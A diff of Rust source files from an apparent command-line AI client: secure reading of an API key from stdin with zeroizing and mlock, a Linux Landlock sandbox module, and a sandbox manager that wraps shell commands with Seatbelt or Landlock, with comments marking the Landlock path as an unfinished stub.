||||
let capacity = buf.len() - prefix_len;
|
||||
let mut total_read = 0usize; // number of bytes read into the token region
|
||||
let mut saw_newline = false;
|
||||
let mut saw_eof = false;
|
||||
|
||||
while total_read < capacity {
|
||||
let slice = &mut buf[prefix_len + total_read..];
|
||||
let read = match read_fn(slice) {
|
||||
Ok(n) => n,
|
||||
Err(err) => {
|
||||
buf.zeroize();
|
||||
return Err(err.into());
|
||||
}
|
||||
};
|
||||
|
||||
if read == 0 {
|
||||
saw_eof = true;
|
||||
break;
|
||||
}
|
||||
|
||||
// Search only the newly written region for a newline.
|
||||
let newly_written = &slice[..read];
|
||||
if let Some(pos) = newly_written.iter().position(|&b| b == b'\n') {
|
||||
total_read += pos + 1; // include the newline for trimming below
|
||||
saw_newline = true;
|
||||
break;
|
||||
}
|
||||
|
||||
total_read += read;
|
||||
|
||||
// Continue loop; if buffer fills without newline/EOF we'll error below.
|
||||
}
|
||||
|
||||
// If buffer filled and we did not see newline or EOF, error out.
|
||||
if total_read == capacity && !saw_newline && !saw_eof {
|
||||
buf.zeroize();
|
||||
return Err(anyhow!(
|
||||
"API key is too large to fit in the {BUFFER_SIZE}-byte buffer"
|
||||
));
|
||||
}
|
||||
|
||||
let mut total = prefix_len + total_read;
|
||||
while total > prefix_len && (buf[total - 1] == b'\n' || buf[total - 1] == b'\r') {
|
||||
total -= 1;
|
||||
}
|
||||
|
||||
if total == AUTH_HEADER_PREFIX.len() {
|
||||
buf.zeroize();
|
||||
return Err(anyhow!(
|
||||
"API key must be provided via stdin (e.g. printenv DEEPSEEK_API_KEY | deepseek responses-api-proxy)"
|
||||
));
|
||||
}
|
||||
|
||||
if let Err(err) = validate_auth_header_bytes(&buf[AUTH_HEADER_PREFIX.len()..total]) {
|
||||
buf.zeroize();
|
||||
return Err(err);
|
||||
}
|
||||
|
||||
let header_str = match std::str::from_utf8(&buf[..total]) {
|
||||
Ok(value) => value,
|
||||
Err(err) => {
|
||||
// In theory, validate_auth_header_bytes() should have caught
|
||||
// any invalid UTF-8 sequences, but just in case...
|
||||
buf.zeroize();
|
||||
return Err(err).context("reading Authorization header from stdin as UTF-8");
|
||||
}
|
||||
};
|
||||
|
||||
let header_value = String::from(header_str);
|
||||
buf.zeroize();
|
||||
|
||||
let leaked: &'static mut str = header_value.leak();
|
||||
mlock_str(leaked);
|
||||
|
||||
Ok(leaked)
|
||||
}
|
||||
|
||||
#[cfg(unix)]
|
||||
fn mlock_str(value: &str) {
|
||||
use libc::_SC_PAGESIZE;
|
||||
use libc::c_void;
|
||||
use libc::mlock;
|
||||
use libc::sysconf;
|
||||
|
||||
if value.is_empty() {
|
||||
return;
|
||||
}
|
||||
|
||||
let page_size = unsafe { sysconf(_SC_PAGESIZE) };
|
||||
if page_size <= 0 {
|
||||
return;
|
||||
}
|
||||
let page_size = page_size as usize;
|
||||
if page_size == 0 {
|
||||
return;
|
||||
}
|
||||
|
||||
let addr = value.as_ptr() as usize;
|
||||
let len = value.len();
|
||||
let start = addr & !(page_size - 1);
|
||||
let addr_end = match addr.checked_add(len) {
|
||||
Some(v) => match v.checked_add(page_size - 1) {
|
||||
Some(total) => total,
|
||||
None => return,
|
||||
},
|
||||
None => return,
|
||||
};
|
||||
let end = addr_end & !(page_size - 1);
|
||||
let size = end.saturating_sub(start);
|
||||
if size == 0 {
|
||||
return;
|
||||
}
|
||||
|
||||
let _ = unsafe { mlock(start as *const c_void, size) };
|
||||
}
|
||||
|
||||
#[cfg(not(unix))]
|
||||
fn mlock_str(_value: &str) {}
|
||||
|
||||
/// The key should match /^[A-Za-z0-9\-_]+$/. Ensure there is no funny business
|
||||
/// with NUL characters and whatnot.
|
||||
fn validate_auth_header_bytes(key_bytes: &[u8]) -> Result<()> {
|
||||
if key_bytes
|
||||
.iter()
|
||||
.all(|byte| byte.is_ascii_alphanumeric() || matches!(byte, b'-' | b'_'))
|
||||
{
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
Err(anyhow!(
|
||||
"API key may only contain ASCII letters, numbers, '-' or '_'"
|
||||
))
|
||||
}
|
||||
+1303
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,344 @@
|
||||
//! Linux Landlock sandbox implementation.
|
||||
//!
|
||||
//! Landlock is a security mechanism introduced in Linux kernel 5.13 that allows
|
||||
//! processes to restrict their own access rights. Unlike Seatbelt on macOS which
|
||||
//! uses an external sandbox-exec wrapper, Landlock applies restrictions directly
|
||||
//! to the current process.
|
||||
//!
|
||||
//! # Requirements
|
||||
//!
|
||||
//! - Linux kernel 5.13 or later with Landlock enabled
|
||||
//! - The kernel must be compiled with `CONFIG_SECURITY_LANDLOCK=y`
|
||||
//!
|
||||
//! # How it works
|
||||
//!
|
||||
//! 1. Create a landlock ruleset with desired restrictions
|
||||
//! 2. Add rules to allow specific file paths
|
||||
//! 3. Restrict the process using the ruleset
|
||||
//!
|
||||
//! Note: Once restricted, the process cannot gain more privileges.
|
||||
|
||||
use super::{CommandSpec, SandboxPolicy};
|
||||
use std::ffi::CString;
|
||||
use std::path::Path;
|
||||
|
||||
/// Check if Landlock is available on this system.
|
||||
pub fn is_available() -> bool {
|
||||
// Check if the landlock syscall is available
|
||||
#[cfg(target_os = "linux")]
|
||||
{
|
||||
// Try to create a minimal ruleset to test availability
|
||||
// Landlock ABI version check
|
||||
// Safety: syscall uses a null ruleset pointer for ABI probing and does not dereference it.
|
||||
unsafe {
|
||||
let result = libc::syscall(
|
||||
libc::SYS_landlock_create_ruleset,
|
||||
std::ptr::null::<libc::c_void>(),
|
||||
0usize,
|
||||
LANDLOCK_CREATE_RULESET_VERSION,
|
||||
);
|
||||
result >= 0
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(not(target_os = "linux"))]
|
||||
{
|
||||
false
|
||||
}
|
||||
}
|
||||
|
||||
/// Get the Landlock ABI version supported by the kernel.
|
||||
#[cfg(target_os = "linux")]
|
||||
pub fn get_abi_version() -> Option<i32> {
|
||||
// Safety: syscall uses a null ruleset pointer for ABI probing and does not dereference it.
|
||||
unsafe {
|
||||
let result = libc::syscall(
|
||||
libc::SYS_landlock_create_ruleset,
|
||||
std::ptr::null::<libc::c_void>(),
|
||||
0usize,
|
||||
LANDLOCK_CREATE_RULESET_VERSION,
|
||||
);
|
||||
if result >= 0 {
|
||||
i32::try_from(result).ok()
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Landlock syscall constants (not yet in libc crate)
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_CREATE_RULESET_VERSION: u32 = 1 << 0;
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_EXECUTE: u64 = 1 << 0;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_WRITE_FILE: u64 = 1 << 1;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_READ_FILE: u64 = 1 << 2;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_READ_DIR: u64 = 1 << 3;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_REMOVE_DIR: u64 = 1 << 4;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_REMOVE_FILE: u64 = 1 << 5;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_MAKE_CHAR: u64 = 1 << 6;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_MAKE_DIR: u64 = 1 << 7;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_MAKE_REG: u64 = 1 << 8;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_MAKE_SOCK: u64 = 1 << 9;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_MAKE_FIFO: u64 = 1 << 10;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_MAKE_BLOCK: u64 = 1 << 11;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_MAKE_SYM: u64 = 1 << 12;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_REFER: u64 = 1 << 13;
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_TRUNCATE: u64 = 1 << 14;
|
||||
|
||||
// Combinations
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_READ: u64 = LANDLOCK_ACCESS_FS_READ_FILE | LANDLOCK_ACCESS_FS_READ_DIR;
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_ACCESS_FS_WRITE: u64 = LANDLOCK_ACCESS_FS_WRITE_FILE
|
||||
| LANDLOCK_ACCESS_FS_REMOVE_DIR
|
||||
| LANDLOCK_ACCESS_FS_REMOVE_FILE
|
||||
| LANDLOCK_ACCESS_FS_MAKE_DIR
|
||||
| LANDLOCK_ACCESS_FS_MAKE_REG
|
||||
| LANDLOCK_ACCESS_FS_MAKE_SYM
|
||||
| LANDLOCK_ACCESS_FS_TRUNCATE;
|
||||
|
||||
/// Landlock ruleset attribute structure
|
||||
#[cfg(target_os = "linux")]
|
||||
#[repr(C)]
|
||||
struct LandlockRulesetAttr {
|
||||
handled_access_fs: u64,
|
||||
}
|
||||
|
||||
/// Landlock path beneath attribute structure
|
||||
#[cfg(target_os = "linux")]
|
||||
#[repr(C)]
|
||||
struct LandlockPathBeneathAttr {
|
||||
allowed_access: u64,
|
||||
parent_fd: i32,
|
||||
}
|
||||
|
||||
/// Rule type constants
|
||||
#[cfg(target_os = "linux")]
|
||||
const LANDLOCK_RULE_PATH_BENEATH: u32 = 1;
|
||||
|
||||
/// A configured Landlock sandbox
|
||||
#[cfg(target_os = "linux")]
|
||||
pub struct LandlockSandbox {
|
||||
ruleset_fd: i32,
|
||||
policy: SandboxPolicy,
|
||||
}
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
impl LandlockSandbox {
|
||||
/// Create a new Landlock sandbox from policy
|
||||
pub fn from_policy(policy: &SandboxPolicy) -> std::io::Result<Self> {
|
||||
// Determine what filesystem access to handle (restrict)
|
||||
let handled_access =
|
||||
LANDLOCK_ACCESS_FS_EXECUTE | LANDLOCK_ACCESS_FS_READ | LANDLOCK_ACCESS_FS_WRITE;
|
||||
|
||||
let attr = LandlockRulesetAttr {
|
||||
handled_access_fs: handled_access,
|
||||
};
|
||||
|
||||
// Create the ruleset
|
||||
// Safety: `attr` is a valid pointer for the syscall duration and size is correct.
|
||||
let ruleset_fd = unsafe {
|
||||
libc::syscall(
|
||||
libc::SYS_landlock_create_ruleset,
|
||||
&raw const attr,
|
||||
std::mem::size_of::<LandlockRulesetAttr>(),
|
||||
0u32,
|
||||
)
|
||||
};
|
||||
|
||||
if ruleset_fd < 0 {
|
||||
return Err(std::io::Error::last_os_error());
|
||||
}
|
||||
|
||||
let ruleset_fd = i32::try_from(ruleset_fd).map_err(|_| {
|
||||
std::io::Error::other("Failed to create Landlock ruleset: file descriptor out of range")
|
||||
})?;
|
||||
|
||||
Ok(Self {
|
||||
ruleset_fd,
|
||||
policy: policy.clone(),
|
||||
})
|
||||
}
|
||||
|
||||
/// Add a read-only rule for a path
|
||||
pub fn allow_read(&self, path: &Path) -> std::io::Result<()> {
|
||||
self.add_rule(path, LANDLOCK_ACCESS_FS_READ | LANDLOCK_ACCESS_FS_EXECUTE)
|
||||
}
|
||||
|
||||
/// Add a read-write rule for a path
|
||||
pub fn allow_write(&self, path: &Path) -> std::io::Result<()> {
|
||||
self.add_rule(
|
||||
path,
|
||||
LANDLOCK_ACCESS_FS_READ | LANDLOCK_ACCESS_FS_WRITE | LANDLOCK_ACCESS_FS_EXECUTE,
|
||||
)
|
||||
}
|
||||
|
||||
/// Add a path rule to the ruleset
|
||||
fn add_rule(&self, path: &Path, access: u64) -> std::io::Result<()> {
|
||||
let path_cstr = CString::new(path.to_string_lossy().as_bytes())
|
||||
.map_err(|_| std::io::Error::new(std::io::ErrorKind::InvalidInput, "Invalid path"))?;
|
||||
|
||||
// Open the path to get a file descriptor
|
||||
// Safety: `path_cstr` is NUL-terminated and lives for the duration of the call.
|
||||
let fd = unsafe { libc::open(path_cstr.as_ptr(), libc::O_PATH | libc::O_CLOEXEC) };
|
||||
|
||||
if fd < 0 {
|
||||
// Path doesn't exist, skip this rule
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let attr = LandlockPathBeneathAttr {
|
||||
allowed_access: access,
|
||||
parent_fd: fd,
|
||||
};
|
||||
|
||||
// Safety: `attr` is a valid pointer for the syscall duration.
|
||||
let result = unsafe {
|
||||
libc::syscall(
|
||||
libc::SYS_landlock_add_rule,
|
||||
self.ruleset_fd,
|
||||
LANDLOCK_RULE_PATH_BENEATH,
|
||||
&raw const attr,
|
||||
0u32,
|
||||
)
|
||||
};
|
||||
|
||||
// Safety: `fd` is a valid file descriptor from libc::open.
|
||||
unsafe {
|
||||
libc::close(fd);
|
||||
}
|
||||
|
||||
if result < 0 {
|
||||
return Err(std::io::Error::last_os_error());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Apply the sandbox to the current process
|
||||
///
|
||||
/// WARNING: This is irreversible for the current process!
|
||||
pub fn apply(&self) -> std::io::Result<()> {
|
||||
// First, drop privileges using prctl
|
||||
// Safety: prctl call uses constant arguments and does not access memory.
|
||||
let result = unsafe { libc::prctl(libc::PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) };
|
||||
if result < 0 {
|
||||
return Err(std::io::Error::last_os_error());
|
||||
}
|
||||
|
||||
// Now restrict the process
|
||||
// Safety: syscall uses a valid ruleset fd and no pointer arguments.
|
||||
let result =
|
||||
unsafe { libc::syscall(libc::SYS_landlock_restrict_self, self.ruleset_fd, 0u32) };
|
||||
|
||||
if result < 0 {
|
||||
return Err(std::io::Error::last_os_error());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
impl Drop for LandlockSandbox {
|
||||
fn drop(&mut self) {
|
||||
// Safety: `ruleset_fd` is a valid descriptor created by landlock.
|
||||
unsafe {
|
||||
libc::close(self.ruleset_fd);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a helper script that sets up Landlock before running the command.
|
||||
///
|
||||
/// Since Landlock restricts the current process, we need a helper that:
|
||||
/// 1. Sets up the Landlock ruleset
|
||||
/// 2. Applies the restrictions
|
||||
/// 3. Execs the target command
|
||||
///
|
||||
/// This returns the command to run with the helper.
|
||||
#[cfg(target_os = "linux")]
|
||||
pub fn create_landlock_wrapper(
|
||||
spec: &CommandSpec,
|
||||
_writable_paths: &[std::path::PathBuf],
|
||||
_readable_paths: &[std::path::PathBuf],
|
||||
) -> Vec<String> {
|
||||
// For simplicity, we'll use a shell wrapper that applies Landlock via a helper binary
|
||||
// In production, this would be a compiled binary that's part of the CLI
|
||||
|
||||
// For now, just return the original command without sandboxing
|
||||
// A full implementation would include a compiled landlock-helper binary
|
||||
let mut cmd = vec![spec.program.clone()];
|
||||
cmd.extend(spec.args.clone());
|
||||
cmd
|
||||
}
|
||||
|
||||
/// Detect if a failure was caused by Landlock denial
|
||||
#[cfg(target_os = "linux")]
|
||||
pub fn detect_denial(exit_code: i32, stderr: &str) -> bool {
|
||||
if exit_code == 0 {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Landlock denials typically result in EACCES or EPERM
|
||||
stderr.contains("Permission denied")
|
||||
|| stderr.contains("Operation not permitted")
|
||||
|| stderr.contains("EACCES")
|
||||
|| stderr.contains("EPERM")
|
||||
}
|
||||
|
||||
// Stub implementations for non-Linux platforms
|
||||
#[cfg(not(target_os = "linux"))]
|
||||
pub fn get_abi_version() -> Option<i32> {
|
||||
None
|
||||
}
|
||||
|
||||
#[cfg(not(target_os = "linux"))]
|
||||
pub fn detect_denial(_exit_code: i32, _stderr: &str) -> bool {
|
||||
false
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_is_available() {
|
||||
// This test will pass regardless of platform
|
||||
let _ = is_available();
|
||||
}
|
||||
|
||||
#[test]
|
||||
#[cfg(target_os = "linux")]
|
||||
fn test_get_abi_version() {
|
||||
// May or may not be available depending on kernel
|
||||
let _ = get_abi_version();
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_detect_denial() {
|
||||
#[cfg(target_os = "linux")]
|
||||
{
|
||||
assert!(detect_denial(1, "Permission denied"));
|
||||
assert!(detect_denial(1, "Operation not permitted"));
|
||||
assert!(!detect_denial(0, "Success"));
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,579 @@
|
||||
//! Sandbox module for secure command execution.
|
||||
//! NOTE: Not yet integrated into shell tool - planned security feature.
|
||||
|
||||
#![allow(dead_code)]
|
||||
|
||||
//!
|
||||
//! This module provides sandboxing capabilities for shell commands executed by
|
||||
//! deepseek-cli. Sandboxing restricts what system resources a command can access,
|
||||
//! preventing accidental or malicious damage to the system.
|
||||
//!
|
||||
//! # Platform Support
|
||||
//!
|
||||
//! - **macOS**: Uses Seatbelt (sandbox-exec) for mandatory access control
|
||||
//! - **Linux**: Uses Landlock (kernel 5.13+) for filesystem access control
|
||||
//! - **Windows**: Falls back to no sandboxing
|
||||
//!
|
||||
//! # Usage
|
||||
//!
|
||||
//! ```rust,ignore
|
||||
//! use sandbox::{SandboxManager, CommandSpec, SandboxPolicy};
|
||||
//!
|
||||
//! let manager = SandboxManager::new();
|
||||
//! let spec = CommandSpec::shell("ls -la", PathBuf::from("."), Duration::from_secs(30))
|
||||
//! .with_policy(SandboxPolicy::default());
|
||||
//!
|
||||
//! let exec_env = manager.prepare(&spec);
|
||||
//! // exec_env.command now contains the sandboxed command
|
||||
//! ```
|
||||
|
||||
pub mod policy;
|
||||
|
||||
#[cfg(target_os = "macos")]
|
||||
pub mod seatbelt;
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
pub mod landlock;
|
||||
|
||||
use std::collections::HashMap;
|
||||
use std::path::PathBuf;
|
||||
use std::time::Duration;
|
||||
|
||||
pub use policy::SandboxPolicy;
|
||||
|
||||
/// Specification for a command to be executed, potentially within a sandbox.
|
||||
///
|
||||
/// This struct captures all the information needed to execute a command:
|
||||
/// the program and arguments, working directory, environment variables,
|
||||
/// timeout, and sandbox policy.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct CommandSpec {
|
||||
/// The program to execute (e.g., "sh", "python", "cargo").
|
||||
pub program: String,
|
||||
|
||||
/// Arguments to pass to the program.
|
||||
pub args: Vec<String>,
|
||||
|
||||
/// Working directory for the command.
|
||||
pub cwd: PathBuf,
|
||||
|
||||
/// Additional environment variables to set.
|
||||
pub env: HashMap<String, String>,
|
||||
|
||||
/// Maximum execution time before the command is killed.
|
||||
pub timeout: Duration,
|
||||
|
||||
/// Sandbox policy controlling resource access.
|
||||
pub sandbox_policy: SandboxPolicy,
|
||||
|
||||
/// Optional justification for why this command needs to run.
|
||||
/// Used for logging and audit purposes.
|
||||
pub justification: Option<String>,
|
||||
}
|
||||
|
||||
impl CommandSpec {
|
||||
/// Create a `CommandSpec` for running a shell command via the platform shell.
|
||||
pub fn shell(command: &str, cwd: PathBuf, timeout: Duration) -> Self {
|
||||
#[cfg(windows)]
|
||||
let (program, args) = (
|
||||
"cmd".to_string(),
|
||||
vec!["/C".to_string(), command.to_string()],
|
||||
);
|
||||
#[cfg(not(windows))]
|
||||
let (program, args) = (
|
||||
"sh".to_string(),
|
||||
vec!["-c".to_string(), command.to_string()],
|
||||
);
|
||||
|
||||
Self {
|
||||
program,
|
||||
args,
|
||||
cwd,
|
||||
env: HashMap::new(),
|
||||
timeout,
|
||||
sandbox_policy: SandboxPolicy::default(),
|
||||
justification: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a `CommandSpec` for running a program directly.
|
||||
pub fn program(program: &str, args: Vec<String>, cwd: PathBuf, timeout: Duration) -> Self {
|
||||
Self {
|
||||
program: program.to_string(),
|
||||
args,
|
||||
cwd,
|
||||
env: HashMap::new(),
|
||||
timeout,
|
||||
sandbox_policy: SandboxPolicy::default(),
|
||||
justification: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set the sandbox policy for this command.
|
||||
pub fn with_policy(mut self, policy: SandboxPolicy) -> Self {
|
||||
self.sandbox_policy = policy;
|
||||
self
|
||||
}
|
||||
|
||||
/// Add environment variables for this command.
|
||||
pub fn with_env(mut self, env: HashMap<String, String>) -> Self {
|
||||
self.env = env;
|
||||
self
|
||||
}
|
||||
|
||||
/// Add a single environment variable.
|
||||
pub fn with_env_var(mut self, key: &str, value: &str) -> Self {
|
||||
self.env.insert(key.to_string(), value.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
/// Set a justification for this command (for logging/audit).
|
||||
pub fn with_justification(mut self, justification: &str) -> Self {
|
||||
self.justification = Some(justification.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
/// Get the original command as a single string (for display).
|
||||
pub fn display_command(&self) -> String {
|
||||
if self.program == "sh" && self.args.len() == 2 && self.args[0] == "-c" {
|
||||
// For shell commands, show the actual command
|
||||
self.args[1].clone()
|
||||
} else if self.program.eq_ignore_ascii_case("cmd")
|
||||
&& self.args.len() == 2
|
||||
&& self.args[0].eq_ignore_ascii_case("/C")
|
||||
{
|
||||
self.args[1].clone()
|
||||
} else {
|
||||
// For other commands, join program and args
|
||||
let mut parts = vec![self.program.clone()];
|
||||
parts.extend(self.args.clone());
|
||||
parts.join(" ")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// The type of sandbox being used for execution.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
|
||||
pub enum SandboxType {
|
||||
/// No sandboxing - command runs with full permissions.
|
||||
#[default]
|
||||
None,
|
||||
|
||||
/// macOS Seatbelt (sandbox-exec) sandboxing.
|
||||
#[cfg(target_os = "macos")]
|
||||
MacosSeatbelt,
|
||||
|
||||
/// Linux Landlock sandboxing (kernel 5.13+).
|
||||
#[cfg(target_os = "linux")]
|
||||
LinuxLandlock,
|
||||
}
|
||||
|
||||
impl std::fmt::Display for SandboxType {
|
||||
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
|
||||
match self {
|
||||
SandboxType::None => write!(f, "none"),
|
||||
#[cfg(target_os = "macos")]
|
||||
SandboxType::MacosSeatbelt => write!(f, "macos-seatbelt"),
|
||||
#[cfg(target_os = "linux")]
|
||||
SandboxType::LinuxLandlock => write!(f, "linux-landlock"),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// The execution environment after sandbox transformation.
|
||||
///
|
||||
/// This contains the actual command to run (which may include sandbox wrapper
|
||||
/// commands) and all necessary environment configuration.
|
||||
#[derive(Debug)]
|
||||
pub struct ExecEnv {
|
||||
/// The full command to execute (may include sandbox wrapper).
|
||||
pub command: Vec<String>,
|
||||
|
||||
/// Working directory for execution.
|
||||
pub cwd: PathBuf,
|
||||
|
||||
/// Environment variables to set.
|
||||
pub env: HashMap<String, String>,
|
||||
|
||||
/// Timeout for the command.
|
||||
pub timeout: Duration,
|
||||
|
||||
/// The type of sandbox being used.
|
||||
pub sandbox_type: SandboxType,
|
||||
|
||||
/// The original policy (for reference).
|
||||
pub policy: SandboxPolicy,
|
||||
}
|
||||
|
||||
impl ExecEnv {
|
||||
/// Get the program to execute (first element of command).
|
||||
pub fn program(&self) -> &str {
|
||||
self.command
|
||||
.first()
|
||||
.map_or("sh", std::string::String::as_str)
|
||||
}
|
||||
|
||||
/// Get the arguments (all elements after the first).
|
||||
pub fn args(&self) -> &[String] {
|
||||
if self.command.len() > 1 {
|
||||
&self.command[1..]
|
||||
} else {
|
||||
&[]
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if this execution is sandboxed.
|
||||
pub fn is_sandboxed(&self) -> bool {
|
||||
!matches!(self.sandbox_type, SandboxType::None)
|
||||
}
|
||||
}
|
||||
|
||||
/// Detect what sandbox technology is available on the current platform.
|
||||
pub fn get_platform_sandbox() -> Option<SandboxType> {
|
||||
#[cfg(target_os = "macos")]
|
||||
{
|
||||
if seatbelt::is_available() {
|
||||
return Some(SandboxType::MacosSeatbelt);
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
{
|
||||
if landlock::is_available() {
|
||||
return Some(SandboxType::LinuxLandlock);
|
||||
}
|
||||
}
|
||||
|
||||
None
|
||||
}
|
||||
|
||||
/// Check if sandboxing is available on this platform.
|
||||
pub fn is_sandbox_available() -> bool {
|
||||
get_platform_sandbox().is_some()
|
||||
}
|
||||
|
||||
/// Manager for sandbox operations.
|
||||
///
|
||||
/// The `SandboxManager` is responsible for:
|
||||
/// - Detecting available sandbox technologies
|
||||
/// - Transforming `CommandSpecs` into sandboxed `ExecEnvs`
|
||||
/// - Detecting sandbox denials from command output
|
||||
#[derive(Debug, Default)]
|
||||
pub struct SandboxManager {
|
||||
/// Cached sandbox availability check.
|
||||
sandbox_available: Option<bool>,
|
||||
|
||||
/// Force a specific sandbox type (for testing).
|
||||
#[allow(dead_code)]
|
||||
forced_sandbox: Option<SandboxType>,
|
||||
}
|
||||
|
||||
impl SandboxManager {
|
||||
/// Create a new `SandboxManager`.
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
sandbox_available: None,
|
||||
forced_sandbox: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if sandboxing is available.
|
||||
pub fn is_available(&mut self) -> bool {
|
||||
if let Some(available) = self.sandbox_available {
|
||||
return available;
|
||||
}
|
||||
|
||||
let available = is_sandbox_available();
|
||||
self.sandbox_available = Some(available);
|
||||
available
|
||||
}
|
||||
|
||||
/// Select the appropriate sandbox type for the given policy.
|
||||
pub fn select_sandbox(&self, policy: &SandboxPolicy) -> SandboxType {
|
||||
// If the policy doesn't want sandboxing, return None
|
||||
if !policy.should_sandbox() {
|
||||
return SandboxType::None;
|
||||
}
|
||||
|
||||
// Check for forced sandbox (testing)
|
||||
if let Some(forced) = self.forced_sandbox {
|
||||
return forced;
|
||||
}
|
||||
|
||||
// Use platform default
|
||||
get_platform_sandbox().unwrap_or(SandboxType::None)
|
||||
}
|
||||
|
||||
/// Transform a `CommandSpec` into a sandboxed `ExecEnv`.
|
||||
///
|
||||
/// This is the main entry point for sandboxing. It takes a command
|
||||
/// specification and returns the actual command to run, which may
|
||||
/// include sandbox wrapper commands.
|
||||
pub fn prepare(&self, spec: &CommandSpec) -> ExecEnv {
|
||||
let sandbox_type = self.select_sandbox(&spec.sandbox_policy);
|
||||
|
||||
match sandbox_type {
|
||||
SandboxType::None => Self::prepare_unsandboxed(spec),
|
||||
|
||||
#[cfg(target_os = "macos")]
|
||||
SandboxType::MacosSeatbelt => Self::prepare_seatbelt(spec),
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
SandboxType::LinuxLandlock => Self::prepare_landlock(spec),
|
||||
}
|
||||
}
|
||||
|
||||
/// Prepare an unsandboxed execution environment.
|
||||
fn prepare_unsandboxed(spec: &CommandSpec) -> ExecEnv {
|
||||
let mut command = vec![spec.program.clone()];
|
||||
command.extend(spec.args.clone());
|
||||
|
||||
ExecEnv {
|
||||
command,
|
||||
cwd: spec.cwd.clone(),
|
||||
env: spec.env.clone(),
|
||||
timeout: spec.timeout,
|
||||
sandbox_type: SandboxType::None,
|
||||
policy: spec.sandbox_policy.clone(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Prepare a Seatbelt-sandboxed execution environment (macOS).
|
||||
#[cfg(target_os = "macos")]
|
||||
fn prepare_seatbelt(spec: &CommandSpec) -> ExecEnv {
|
||||
// Build the original command
|
||||
let mut original_command = vec![spec.program.clone()];
|
||||
original_command.extend(spec.args.clone());
|
||||
|
||||
// Generate sandbox-exec arguments
|
||||
let seatbelt_args =
|
||||
seatbelt::create_seatbelt_args(original_command, &spec.sandbox_policy, &spec.cwd);
|
||||
|
||||
// Prepend sandbox-exec to the command
|
||||
let mut command = vec![seatbelt::SANDBOX_EXEC_PATH.to_string()];
|
||||
command.extend(seatbelt_args);
|
||||
|
||||
// Add sandbox indicator to environment
|
||||
let mut env = spec.env.clone();
|
||||
env.insert("DEEPSEEK_SANDBOX".to_string(), "seatbelt".to_string());
|
||||
|
||||
ExecEnv {
|
||||
command,
|
||||
cwd: spec.cwd.clone(),
|
||||
env,
|
||||
timeout: spec.timeout,
|
||||
sandbox_type: SandboxType::MacosSeatbelt,
|
||||
policy: spec.sandbox_policy.clone(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Prepare a Landlock-sandboxed execution environment (Linux).
|
||||
///
|
||||
/// Note: Landlock restricts the current process, so for subprocess sandboxing
|
||||
/// we would need a helper binary. For now, this prepares the environment with
|
||||
/// appropriate markers but doesn't actually apply Landlock (would need helper).
|
||||
#[cfg(target_os = "linux")]
|
||||
fn prepare_landlock(spec: &CommandSpec) -> ExecEnv {
|
||||
// Build the original command
|
||||
let mut command = vec![spec.program.clone()];
|
||||
command.extend(spec.args.clone());
|
||||
|
||||
// Add sandbox indicator to environment
|
||||
let mut env = spec.env.clone();
|
||||
env.insert("DEEPSEEK_SANDBOX".to_string(), "landlock".to_string());
|
||||
|
||||
// Note: Full Landlock implementation would use a helper binary that:
|
||||
// 1. Sets up the Landlock ruleset based on policy
|
||||
// 2. Applies restrictions to itself
|
||||
// 3. Execs the target command
|
||||
//
|
||||
